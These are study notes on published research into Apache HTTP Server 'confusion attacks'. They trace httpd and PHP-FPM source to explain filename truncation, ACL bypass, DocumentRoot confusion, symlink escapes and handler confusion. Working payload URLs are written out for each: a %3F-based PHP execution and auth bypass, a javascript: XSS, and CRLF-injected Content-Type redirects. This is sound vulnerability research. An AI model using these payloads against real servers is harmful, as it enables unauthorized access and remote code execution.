Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server! Reading Notes

source

Based on the post published by Orange: https://blog.orange.tw/2024/08/confusion-attacks-ch.html

apache source code
https://github.com/apache/httpd/

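Introduction

Apache was chosen because the whole httpd service relies on hundreds of small modules cooperating to handle a client's HTTP request. Differences in how those modules implement and interpret shared state, and their lack of knowledge about each other, can lead to vulnerabilities. (In the original diagram, the block in the middle is the large struct that the modules share.)

Modules listed in the official documentation: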
https://httpd.apache.org/docs/2.4/mod/

way to run php

mod_php
php_fpm
mod_fastcgi
…

Attack Surface 1: Confusion Attacks

Filename Confusion

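First, r->filename looks like it should be a filesystem path, yet in httpd some modules treat it as a URL.

As shown below, mod_rewrite (whose RewriteRule directive rewrites a path according to a given rule) treats it as a URL:

RewriteRule Pattern Substitution [flags]

For example: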


RewriteEngine On
RewriteRule "^/user/(.+)$" "/var/user/$1/profile.yml"

If we request http://server/user/orange

the part after /user/ (orange) is captured into $1,
so the rule resolves to

/var/user/orange/profile.yml

https://github.com/apache/httpd/blob/2.4.58/modules/mappers/mod_rewrite.c#L4141

/*
 * Apply a single RewriteRule
 */
static int apply_rewrite_rule(rewriterule_entry *p, rewrite_ctx *ctx)
{
    ap_regmatch_t regmatch[AP_MAX_REG_MATCH];
    apr_array_header_t *rewriteconds;
    rewritecond_entry *conds;
    
    // [...]
    
    for (i = 0; i < rewriteconds->nelts; ++i) {
        rewritecond_entry *c = &conds[i];
        rc = apply_rewrite_cond(c, ctx);
        
        // [...] do the remaining stuff
        
    }
    
    /* Now adjust API's knowledge about r->filename and r->args */
    r->filename = newuri;

    if (ctx->perdir && (p->flags & RULEFLAG_DISCARDPATHINFO)) {
        r->path_info = NULL;
    }

    splitout_queryargs(r, p->flags);         // <------- [!!!] Truncate the `r->filename`
    
    // [...]
}

Note this call:

splitout_queryargs(r, p->flags)

Following it leads to https://github.com/apache/httpd/blob/2.4.58/modules/mappers/mod_rewrite.c#L771

static void splitout_queryargs(request_rec *r, int flags)
{
    char *q;
    int split, skip;
    int qsappend = flags & RULEFLAG_QSAPPEND;
    int qsdiscard = flags & RULEFLAG_QSDISCARD;
    int qslast = flags & RULEFLAG_QSLAST;

    if (flags & RULEFLAG_QSNONE) {
        rewritelog((r, 2, NULL, "discarding query string, no parse from substitution"));
        r->args = NULL;
        return;
    }

    /* don't touch, unless it's a scheme for which a query string makes sense.
     * See RFC 1738 and RFC 2368.
     */
    if ((skip = is_absolute_uri(r->filename, &split))
        && !split) {
        r->args = NULL; /* forget the query that's still flying around */
        return;
    }

    if (qsdiscard) {
        r->args = NULL; /* Discard query string */
        rewritelog((r, 2, NULL, "discarding query string"));
    }

    q = qslast ? ap_strrchr(r->filename + skip, '?') : ap_strchr(r->filename + skip, '?');

    if (q != NULL) {
        char *olduri;
        apr_size_t len;

        olduri = apr_pstrdup(r->pool, r->filename);
        *q++ = '\0';
        if (qsappend) {
            if (*q) {
                r->args = apr_pstrcat(r->pool, q, "&" , r->args, NULL);
            }
        }
        else {
            r->args = apr_pstrdup(r->pool, q);
        }

        if (r->args) {
           len = strlen(r->args);

           if (!len) {
               r->args = NULL;
           }
           else if (r->args[len-1] == '&') {
               r->args[len-1] = '\0';
           }
        }

        rewritelog((r, 3, NULL, "split uri=%s -> uri=%s, args=%s", olduri,
                    r->filename, r->args ? r->args : "<none>"));
    }
}

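In short, it treats everything after the ? as the query string and cuts it off r->filename. So if we use the URL-encoded characters
%2F -> /
%3F -> ?

http://server/user/orange%2Fsecret.yml%3F

the substitution produces

/var/user/orange/secret.yml?/profile.yml

The part after the question mark is split off as the query string, leaving

/var/user/orange/secret.yml

and the path truncation is complete.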
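
The truncation can be reproduced outside Apache. The sketch below is a simplified Python model, not mod_rewrite itself: `rewrite_and_split` is a hypothetical helper that URL-decodes the path, applies the rule from the example (only `$1` is supported), and then splits at the first `?`, roughly what splitout_queryargs does when no query-string flags are set.

```python
import re
from urllib.parse import unquote


def rewrite_and_split(url_path, pattern, substitution):
    """Model a RewriteRule followed by the '?' split (simplified assumption)."""
    decoded = unquote(url_path)            # the rule is matched against the decoded path
    match = re.match(pattern, decoded)
    if match is None:
        return None                        # the rule does not apply
    # Only the $1 back-reference is handled in this sketch.
    new_uri = substitution.replace("$1", match.group(1))
    # Everything after the first '?' is treated as the query string.
    filename, sep, args = new_uri.partition("?")
    return filename, (args if sep else None)


rule = (r"^/user/(.+)$", "/var/user/$1/profile.yml")
print(rewrite_and_split("/user/orange", *rule))
print(rewrite_and_split("/user/orange%2Fsecret.yml%3F", *rule))
```

The second call shows the intended suffix /profile.yml ending up in the query string instead of the file name.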

Mislead RewriteFlag Assignment

Suppose the administrator uses a configuration like this:

RewriteEngine On
RewriteRule  ^(.+\.php)$  $1  [H=application/x-httpd-php]

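If the requested path ends in .php, the rule assigns the handler that corresponds to mod_php.
https://httpd.apache.org/docs/2.4/rewrite/flags.html

The flag set here is
[H=application/x-httpd-php]

H -> handler
It forces every matching file to be processed by the application/x-httpd-php handler, so the server executes it as PHP.

Now suppose I upload a file 1.gif with the content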

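<?=`id`;?>

If I simply request

http://server/upload/1.gif

then in theory it is just a .gif and nothing gets executed.

But if I request it like this

http://server/upload/1.gif%3Fooo.php

the path ends in .php, so the rule forces the PHP handler. The ? truncation then discards ooo.php, and in the end 1.gif is parsed and executed as PHP:

<?=`id`;?>

which prints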

 # GIF89a uid=33(www-data) gid=33(www-data) groups=33(www-data)
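
The order of the two steps is what matters here: the handler is chosen from the full decoded path, and only afterwards is the file name cut at `?`. The following is a minimal Python sketch of that ordering under simplifying assumptions; `apply_handler_rule` is a hypothetical name and the model ignores everything else mod_rewrite does.

```python
import re
from urllib.parse import unquote

# Same pattern as the RewriteRule above.
PHP_RULE = re.compile(r"^(.+\.php)$")


def apply_handler_rule(url_path):
    """Return (filename, forced_handler) for the H= rule (simplified model)."""
    decoded = unquote(url_path)
    match = PHP_RULE.match(decoded)
    if match is None:
        return decoded, None               # rule not applied, no handler forced
    substituted = match.group(1)           # the Substitution is "$1"
    filename = substituted.partition("?")[0]   # '?' split happens after the match
    return filename, "application/x-httpd-php"


print(apply_handler_rule("/upload/1.gif"))
print(apply_handler_rule("/upload/1.gif%3Fooo.php"))
```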

ACL Bypass

what is apache ACL?
https://httpd.apache.org/docs/2.4/howto/access.html

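The second Filename Confusion attack happens in mod_proxy. Whereas the previous attack relied on a module unconditionally treating the target as a URL, this one is an authentication and access-control bypass caused by modules disagreeing about what r->filename means.

mod_proxy forwards requests to other URLs,
so it parses r->filename as a URL.

https://httpd.apache.org/docs/current/mod/core.html#files

Apache's Files directive can restrict access to a single file, but in a default PHP-FPM installation this kind of configuration can be bypassed directly: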

<Files "admin.php">
    AuthType Basic 
    AuthName "Admin Panel"
    AuthUserFile "/etc/apache2/.htpasswd"
    Require valid-user
</Files>

If I send a request like this

http://server/admin.php%3Fooo.php

the r->filename field is now admin.php?ooo.php, which naturally does not match admin.php.

Next, the default PHP-FPM setup hands the request to mod_proxy through SetHandler:

https://blog.csdn.net/qq_21956483/article/details/82847744

# Using (?:pattern) instead of (pattern) is a small optimization that
# avoid capturing the matching pattern (as $1) which isn't used here
<FilesMatch ".+\.ph(?:ar|p|tml)$">
    SetHandler "proxy:unix:/run/php/php8.2-fpm.sock|fcgi://localhost"
</FilesMatch>

mod_proxy rewrites r->filename into the following URL

proxy:fcgi://127.0.0.1:9000/var/www/html/admin.php?ooo.php

The backend applies special handling to the file name it receives.
Here is the logic:
https://github.com/php/php-src/blob/ce51bfac759dedac1537f4d5666dcd33fbc4a281/sapi/fpm/fpm/fpm_main.c#L1044

#define APACHE_PROXY_FCGI_PREFIX "proxy:fcgi://"
#define APACHE_PROXY_BALANCER_PREFIX "proxy:balancer://"

if (env_script_filename &&
    strncasecmp(env_script_filename, APACHE_PROXY_FCGI_PREFIX, sizeof(APACHE_PROXY_FCGI_PREFIX) - 1) == 0) {
    /* advance to first character of hostname */
    char *p = env_script_filename + (sizeof(APACHE_PROXY_FCGI_PREFIX) - 1);
    while (*p != '\0' && *p != '/') {
        p++;    /* move past hostname and port */
    }
    if (*p != '\0') {
        /* Copy path portion in place to avoid memory leak.  Note
         * that this also affects what script_path_translated points
         * to. */
        memmove(env_script_filename, p, strlen(p) + 1);
        apache_was_here = 1;
    }
    /* ignore query string if sent by Apache (RewriteRule) */
    p = strchr(env_script_filename, '?');
    if (p) {
        *p =0;
    }
}

Here too the string is truncated at ?, and the real file path (that is, /var/www/html/admin.php) is extracted and executed

p = strchr(env_script_filename, '?');
if (p)
    *p = 0;

This bypasses the Files restriction.

The authentication module and mod_proxy interpret the r->filename field differently -> bypass

Summary

HTTP -> access checker -> /var/www/html/admin.php?ooo.php(r->filename)

HTTP -> mod_proxy -> proxy:fcgi://127.0.0.1:9000/var/www/html/admin.php?ooo.php

Truncated at ?, so the script actually run is proxy:fcgi://127.0.0.1:9000/var/www/html/admin.php
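
The disagreement can be put side by side in a few lines. This is a hedged Python sketch: `files_section_applies` is a hypothetical stand-in for the Files check (assumed here to compare the pattern against the last path component), and `fpm_script_filename` is a straightforward port of the PHP-FPM snippet quoted above.

```python
import fnmatch
import posixpath

FCGI_PREFIX = "proxy:fcgi://"


def files_section_applies(r_filename, files_pattern):
    """Assumption: <Files> is matched against the last path component."""
    return fnmatch.fnmatchcase(posixpath.basename(r_filename), files_pattern)


def fpm_script_filename(env_script_filename):
    """Python port of the PHP-FPM prefix and '?' handling shown above."""
    name = env_script_filename
    if name[:len(FCGI_PREFIX)].lower() == FCGI_PREFIX:
        rest = name[len(FCGI_PREFIX):]
        slash = rest.find("/")
        if slash != -1:
            name = rest[slash:]            # drop "proxy:fcgi://host:port"
        query = name.find("?")
        if query != -1:
            name = name[:query]            # ignore everything after '?'
    return name


seen_by_acl = "/var/www/html/admin.php?ooo.php"
seen_by_fpm = "proxy:fcgi://127.0.0.1:9000/var/www/html/admin.php?ooo.php"
print(files_section_applies(seen_by_acl, "admin.php"))   # protection not applied
print(fpm_script_filename(seen_by_fpm))                  # protected script still runs
```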

Attack Surface 2: DocumentRoot Confusion

Consider this configuration:

DocumentRoot /var/www/html
RewriteRule  ^/html/(.*)$   /$1.html

If we visit

http://server/html/about

will it access /var/www/html/about.html or /about.html?
Answer: both.

httpd tries the path without the DocumentRoot prefix first and then the path with it:
https://github.com/apache/httpd/blob/c3ad18b7ee32da93eabaae7b94541d3c32264340/modules/mappers/mod_rewrite.c#L4939

    if(!(conf->options & OPTION_LEGACY_PREFIX_DOCROOT)) {
        uri_reduced = apr_table_get(r->notes, "mod_rewrite_uri_reduced");
    }

    if (!prefix_stat(r->filename, r->pool) || uri_reduced != NULL) {     // <------ [1] access without root
        int res;
        char *tmp = r->uri;

        r->uri = r->filename;
        res = ap_core_translate(r);             // <------ [2] access with root
        r->uri = tmp;

        if (res != OK) {
            rewritelog((r, 1, NULL, "prefixing with document_root of %s"
                        " FAILED", r->filename));

            return res;
        }

        rewritelog((r, 2, NULL, "prefixed with document_root to %s",
                    r->filename));
    }

    rewritelog((r, 1, NULL, "go-ahead with %s [OK]", r->filename));
    return OK;
}
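
A rough Python model of this two-step lookup is sketched below. It assumes, as a simplification of prefix_stat, that only the first path component is checked for existence, and it ignores the uri_reduced case. `resolve`, `first_segment` and the injected `exists` callable are hypothetical names, and `FAKE_FS` is made-up data standing in for the real filesystem.

```python
def first_segment(path):
    """Return '/' plus the first path component, e.g. '/usr' for '/usr/share/x'."""
    head = path.lstrip("/").split("/", 1)[0]
    return "/" + head


def resolve(rewritten, document_root, exists):
    """Pick the filesystem path the way the snippet above appears to."""
    if exists(first_segment(rewritten)):
        return rewritten                           # [1] used without DocumentRoot
    return document_root.rstrip("/") + rewritten   # [2] DocumentRoot is prefixed


FAKE_FS = {"/usr", "/etc", "/var"}                 # pretend top-level directories
print(resolve("/about.html", "/var/www/html", FAKE_FS.__contains__))
print(resolve("/usr/share/doc/readme.html", "/var/www/html", FAKE_FS.__contains__))
```

In this model, a rewritten path whose first component exists on disk never gets the DocumentRoot prefix.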

https://httpd.apache.org/docs/current/rewrite/remapping.html#rewrite-query
The examples in the official documentation include some problematic patterns:

RewriteRule  "^/html/(.*)$"  "/$1.html"

RewriteRule  "^(.*)\.(css|js|ico|svg)" "$1\.$2.gz"

If we control the prefix of the RewriteRule target, can't we browse any file on the operating system?

Let's build the attack on this configuration:

RewriteEngine On
RewriteRule  "^/html/(.*)$"  "/$1.html"

Local Gadgets Manipulation!

At this point you might expect to read arbitrary files such as /etc/passwd, but that does not work, because of:

<Directory />
    AllowOverride None
    Require all denied
</Directory>

https://luckymrwang.github.io/2015/06/03/Apache-AllowOverride-None-及-Option-详解/
https://github.com/apache/httpd/blob/trunk/docs/conf/httpd.conf.in#L115
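Apache's built-in configuration denies access to the root directory and everything under it. AllowOverride None also makes it ignore rewrite rules in .htaccess files, which avoids dangerous rewrites.

However, on Ubuntu/Debian we find: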
https://sources.debian.org/src/apache2/2.4.62-1/debian/config-dir/apache2.conf.in/#L165

<Directory /usr/share>
    AllowOverride None
    Require all granted
</Directory>

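/usr/share is allowed, so we can try to abuse everything under that directory: tutorial examples, documentation, and unit-test files.
In other words, treat files as gadgets and chain them into various attacks.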
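
The effect of the two Directory blocks can be approximated as a longest-prefix lookup. This is only a sketch under that assumption (Apache's real section merging is more involved); `RULES` and `is_allowed` are hypothetical names, and the table contains just the two blocks quoted above.

```python
import posixpath

# Directory -> "Require all granted?" for the two blocks quoted above.
RULES = {"/": False, "/usr/share": True}


def is_allowed(path, rules=RULES):
    """Longest matching directory prefix decides (simplified assumption)."""
    path = posixpath.normpath(path)
    best = None
    for directory, granted in rules.items():
        prefix = directory.rstrip("/")
        if path == directory or path.startswith(prefix + "/"):
            if best is None or len(directory) > len(best[0]):
                best = (directory, granted)
    return best is not None and best[1]


print(is_allowed("/etc/passwd"))
print(is_allowed("/usr/share/doc/some-package/example.php"))
```

Under this model, anything a package installs below /usr/share is reachable once the rewrite target can be steered there.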

Local Gadget to Information Disclosure

websocketd:
The example PHP under /usr/share/doc/websocketd/examples/php/ can leak sensitive environment variables
https://github.com/Textalk/websocket-php/tree/master/examples

Packages such as NGINX and Jetty offer plenty to abuse as well. Their default web roots live under /usr/share, so a lot of sensitive information can be read

/usr/share/nginx/html/
/usr/share/jetty9/etc/
/usr/share/jetty9/webapps/

In addition, the setup.php that ships with the Davical package exposes phpinfo output

Local Gadget to XSS

/usr/share/libreoffice/help/help.html

var url = window.location.href;
var n = url.indexOf('?');
if (n != -1) {
    // the URL came from LibreOffice help (F1)
    var version = getParameterByName("Version", url);
    var query = url.substr(n + 1, url.length);
    var newURL = version + '/index.html?' + query;
    window.location.replace(newURL);
} else {
    window.location.replace('latest/index.html');
}

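This is the language-switching feature that LibreOffice provides.
It places version in front of /index.html, so a version value that starts with javascript: turns newURL into a script URL and achieves XSS.

/usr/share/libreoffice/help/help.html??Version=javascript:alert(1)//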
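
To see what newURL ends up as, the redirect logic can be replayed in Python. This is a sketch with assumptions: getParameterByName is not shown in the notes, so `get_parameter_by_name` below is a guess at a typical implementation, and the host name in the example URL is a placeholder.

```python
import re
from urllib.parse import unquote


def get_parameter_by_name(name, url):
    """Assumed behaviour: first ?name= or &name= value, URL-decoded."""
    match = re.search(r"[?&]" + re.escape(name) + r"=([^&#]*)", url)
    return unquote(match.group(1)) if match else ""


def build_new_url(href):
    """Python rendering of the help.html redirect logic above."""
    n = href.find("?")
    if n == -1:
        return "latest/index.html"
    version = get_parameter_by_name("Version", href)
    query = href[n + 1:]
    return version + "/index.html?" + query


href = "http://server/usr/share/libreoffice/help/help.html??Version=javascript:alert(1)//"
print(build_new_url(href))
```

The resulting string begins with the javascript: scheme, and the trailing // turns the appended /index.html?... part into a comment.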

Local Gadget to LFI

Tutorial or debug files bundled with JpGraph, jQuery-jFeed, and WordPress or Moodle plugins can be chained into LFI
/usr/share/doc/libphp-jpgraph-examples/examples/show-source.php
/usr/share/javascript/jquery-jfeed/proxy.php
/usr/share/moodle/mod/assignment/type/wims/getcsv.php

https://github.com/jfhovinne/jFeed/blob/master/proxy.php

<?php
header('Content-type: application/xml');
$handle = fopen($_REQUEST['url'], "r");

if ($handle) {
    while (!feof($handle)) {
        $buffer = fgets($handle, 4096);
        echo $buffer;
    }
    fclose($handle);
}
?>

fopen is called on unfiltered input, which allows arbitrary file reads

Local Gadget to SSRF

MagpieRSS -> magpie_debug.php

...
if ( isset($_GET['url']) ) {
	$url = $_GET['url'];
}
else {
	$url = 'http://magpierss.sf.net/test.rss';
}


test_library_support();

$rss = fetch_rss( $url );
...

fetch_rss can be used for SSRF
https://github.com/cogdog/feed2js/blob/master/magpie_debug.php

Local Gadget to RCE

If files from an old phpunit version are present, CVE-2017-9841 can be used directly
https://github.com/vulhub/vulhub/tree/master/phpunit/CVE-2017-9841

phpLiteAdmin: the default password is admin

Jailbreak from Local Gadgets

Next comes breaking out of /usr/share.
The distribution's httpd configuration enables FollowSymLinks by default
https://sources.debian.org/src/apache2/2.4.62-1/debian/config-dir/apache2.conf.in/#L160

<Directory />
	Options FollowSymLinks
	AllowOverride None
	Require all denied
</Directory>

So symlinks can be used to read files outside that directory
https://httpd.apache.org/docs/current/mod/core.html#options

Jailbreak from Local Gadgets

Cacti Log: /usr/share/cacti/site/ -> /var/log/cacti/
Solr Data: /usr/share/solr/data/ -> /var/lib/solr/data
Solr Config: /usr/share/solr/conf/ -> /etc/solr/conf/
MediaWiki Config: /usr/share/mediawiki/config/ -> /var/lib/mediawiki/config/
SimpleSAMLphp Config: /usr/share/simplesamlphp/config/ -> /etc/simplesamlphp/

Jailbreak Local Gadgets to Redmine RCE

Redmine's double symlink leads to RCE

$ file /usr/share/redmine/instances/
 symbolic link to /var/lib/redmine/
$ file /var/lib/redmine/config/
 symbolic link to /etc/redmine/default/
$ ls /etc/redmine/default/
 database.yml    secret_key.txt

We hop from /usr/share to /var/lib/redmine, then on to /etc/redmine, and read the secret key
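
The two hops can be traced with a small Python model. `SYMLINKS` simply restates the two links printed by `file` above, and `resolve` is a hypothetical helper that rewrites a path prefix each time it crosses a link. It is a sketch of the reasoning, not of how the kernel resolves paths.

```python
# The two symlinks reported by `file` above (trailing slashes dropped).
SYMLINKS = {
    "/usr/share/redmine/instances": "/var/lib/redmine",
    "/var/lib/redmine/config": "/etc/redmine/default",
}


def resolve(path, links=SYMLINKS, max_hops=16):
    """Follow symlinked prefixes until none applies."""
    for _ in range(max_hops):
        for link, target in links.items():
            if path == link or path.startswith(link + "/"):
                path = target + path[len(link):]
                break
        else:
            return path                    # no link matched: fully resolved
    raise RuntimeError("too many symlink hops")


print(resolve("/usr/share/redmine/instances/config/secret_key.txt"))
```

A path that starts inside the allowed /usr/share tree ends up at a file under /etc/redmine/default/.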

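secret_key.txt is the key that Ruby on Rails (RoR) uses for signing.
With the key known, a malicious Marshal object is signed and encrypted, then embedded in a cookie, and server-side deserialization finally yields remote code execution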
https://drive.google.com/file/d/1UMxphxFxwRf7wbrw4_Hr56KGPzpLU3Ef/view

Attack Surface 3: Handler Confusion

Both of these directives get PHP running:

AddHandler application/x-httpd-php .php
AddType    application/x-httpd-php .php

https://github.com/apache/httpd/blob/2.4.58/server/config.c#L420

AP_CORE_DECLARE(int) ap_invoke_handler(request_rec *r) {

    // [...]

    if (!r->handler) {
        if (r->content_type) {
            handler = r->content_type;
            if ((p=ap_strchr_c(handler, ';')) != NULL) {
                char *new_handler = (char *)apr_pmemdup(r->pool, handler,
                                                        p - handler + 1);
                char *p2 = new_handler + (p - handler);
                handler = new_handler;

                /* exclude media type arguments */
                while (p2 > handler && p2[-1] == ' ')
                    --p2; /* strip trailing spaces */

                *p2='\0';
            }
        }
        else {
            handler = AP_DEFAULT_HANDLER_NAME;
        }

        r->handler = handler;
    }

    result = ap_run_handler(r);

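Let's read through this code.

First it checks whether r->handler is already set.

If r->handler is not set, the code tries to derive it from r->content_type:

If r->content_type is set, its value is assigned to handler (any media type parameters after ; are stripped).

If r->content_type is not set, the default handler (AP_DEFAULT_HANDLER_NAME) is used.

Finally, ap_run_handler(r) invokes the handler to process the request.

So both directives end up selecting the right handler.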
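
The selection logic is short enough to restate in Python. This is a sketch that mirrors the C snippet above rather than any Apache API: `effective_handler` is a hypothetical name, and `DEFAULT_HANDLER_NAME` is a placeholder standing in for AP_DEFAULT_HANDLER_NAME.

```python
DEFAULT_HANDLER_NAME = ""   # placeholder for AP_DEFAULT_HANDLER_NAME (assumption)


def effective_handler(handler, content_type):
    """Mirror of the r->handler fallback in ap_invoke_handler (sketch)."""
    if handler:
        return handler                     # an explicit handler always wins
    if content_type:
        # Drop media type parameters after ';' and trailing spaces.
        return content_type.split(";", 1)[0].rstrip(" ")
    return DEFAULT_HANDLER_NAME


print(effective_handler("application/x-httpd-php", None))         # AddHandler path
print(effective_handler(None, "application/x-httpd-php"))         # AddType path
print(effective_handler(None, "text/html ; charset=utf-8"))
```

The first two calls return the same handler name, which is why AddHandler and AddType both work, and why the content type becomes security-relevant whenever r->handler is empty.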

Overwrite the Handler

Suppose Apache HTTP Server runs PHP through AddType

AddType application/x-httpd-php  .php

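When we request
http://server/config.php

type_checker copies the type that AddType maps to the file extension into r->content_type,

and nothing in the whole HTTP lifecycle assigns r->handler,

so on entering ap_invoke_handler, r->content_type is used as the module handler.

The source above also shows that handler is set from r->content_type.
But what happens if r->content_type is overwritten before ap_invoke_handler runs?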

Overwrite Handler to Disclose PHP Source Code

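Start with this talk:
https://web.archive.org/web/20210909012535/https://zeronights.ru/wp-content/uploads/2021/09/013_dmitriev-maksim.pdf

Sending a wrong Content-Length not only produces an error but also returns the PHP source code.

ModSecurity does not properly check a return value when using APR,
so r->content_type gets rewritten to text/html: it wants to send an error page, and the field is overwritten.

This sends two responses:
one is the error page,
the other is the PHP page that should have used application/x-httpd-php but was overwritten to text/html and returned as plain text.

The result is a double response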
https://github.com/owasp-modsecurity/ModSecurity/issues/2514

Invoke Arbitrary Handlers

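The observation here is that merely being able to overwrite r->content_type is enough to invoke any internal module handler of Apache HTTP Server.

However, the spot where this goes wrong sits at the very end of the request lifecycle.

So how do we actually trigger it?

We build on this script: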

use CGI;
my $q = CGI->new;
my $redir = $q->param("r");
if ($redir =~ m{^https?://}) {
    print "Location: $redir\n";
}
print "Content-Type: text/html\n\n";

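This code is flawed: redir is attacker-controlled, which allows CRLF injection and therefore forged headers.

https://ithelp.ithome.com.tw/articles/10242682

Also look at the RFC
https://datatracker.ietf.org/doc/html/rfc3875
It specifies how redirects from CGI scripts work.

Next, trace the code: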

    if ((ret = ap_scan_script_header_err_brigade_ex(r, bb, sbuf,          // <------ [1]
                                                    APLOG_MODULE_INDEX)))
    {
        ret = log_script(r, conf, ret, dbuf, sbuf, bb, script_err);

        // [...]

        if (ret == HTTP_NOT_MODIFIED) {
            r->status = ret;
            return OK;
        }

        return ret;
    }

    location = apr_table_get(r->headers_out, "Location");

    if (location && r->status == 200) {
        // [...]
    }

    if (location && location[0] == '/' && r->status == 200) {          // <------ [2]
        /* This redirect needs to be a GET no matter what the original
         * method was.
         */
        r->method = "GET";
        r->method_number = M_GET;

        /* We already read the message body (if any), so don't allow
         * the redirected request to think it has one.  We can ignore
         * Transfer-Encoding, since we used REQUEST_CHUNKED_ERROR.
         */
        apr_table_unset(r->headers_in, "Content-Length");

        ap_internal_redirect_handler(location, r);                     // <------ [3]
        return OK;
    }

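This checks that a Location header exists, starts with /, and that the HTTP status code is 200 (the request succeeded). It means the request should be redirected to a different location on the same server.

When such a redirect is needed, this line performs an internal redirect: the server replaces the current request path with the new path given in the Location header and processes the request again.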

AP_DECLARE(void) ap_internal_redirect_handler(const char *new_uri, request_rec *r)
{
    int access_status;
    request_rec *new = internal_internal_redirect(new_uri, r);    // <------ [1]

    /* ap_die was already called, if an error occured */
    if (!new) {
        return;
    }

    if (r->handler)
        ap_set_content_type(new, r->content_type);                // <------ [2]
    access_status = ap_process_request_internal(new);             // <------ [3]
    if (access_status == OK) {
        access_status = ap_invoke_handler(new);                   // <------ [4]
    }
    ap_die(access_status, new);
}

Stepping into ap_internal_redirect_handler reveals the key line

ap_set_content_type(new, r->content_type);

The value is copied over directly,
so a new HTTP request flow starts with it.

Finally, back to the CRLF part:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:server-status %0d%0a
%0d%0a

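This forges the Content-Type.

With the handler under full control,
we can upload something like a malicious image and have the handler of our choice execute that image as a script.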

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/uploads/avatar.webp %0d%0a
Content-Type:application/x-httpd-php %0d%0a
%0d%0a
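
The whole chain (CRLF injection, header scan, internal redirect) can be walked through in Python. Everything here is a simplified model with assumptions: `cgi_output` imitates the Perl script, `scan_script_headers` assumes the last occurrence of a repeated header wins and that parsing stops at the first blank line, and `internal_redirect` mirrors only the checks visible in the C snippets above. All three names are hypothetical, and the payload is written without the spaces used for layout in the requests above.

```python
from urllib.parse import unquote


def cgi_output(redir):
    """What the vulnerable CGI script prints for a given `r` parameter."""
    out = ""
    if redir.startswith(("http://", "https://")):
        out += "Location: " + redir + "\n"
    out += "Content-Type: text/html\n\n"
    return out


def scan_script_headers(raw):
    """Read headers up to the first blank line; later duplicates overwrite."""
    headers = {}
    for line in raw.split("\n"):
        line = line.rstrip("\r")
        if line == "":
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def internal_redirect(headers, status=200, handler="cgi-script"):
    """Return (new_uri, copied_content_type), or None if no local redirect."""
    location = headers.get("location", "")
    if not (location.startswith("/") and status == 200):
        return None
    # r->handler is set for the CGI request, so its content type is copied.
    content_type = headers.get("content-type") if handler else None
    return location, content_type


payload = unquote("http://%0d%0aLocation:/ooo%0d%0aContent-Type:server-status%0d%0a%0d%0a")
print(internal_redirect(scan_script_headers(cgi_output(payload))))
```

The new request has no handler of its own, so the copied content type is what ap_invoke_handler falls back to.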

Arbitrary Handler to RCE

https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html

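Conclusion

My two favorite parts: the first is using files as gadgets, abusing whatever already exists on the server, be it tutorial files or documentation, and chaining it into RCE.

The second is using symlinks to escape the current directory and abuse files in other directories, again chaining into RCE.

Tutorial files that developers assumed were safe (because users could not reach them) become reachable once a single ? truncates the path, and convenient symlinks let the attacker escape the directory. It is a very novel idea: seemingly harmless things, triggered one after another, end in RCE. Really cool.

Hats off to Orange orz

Leaving this here as a to-do: I will reproduce it later.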
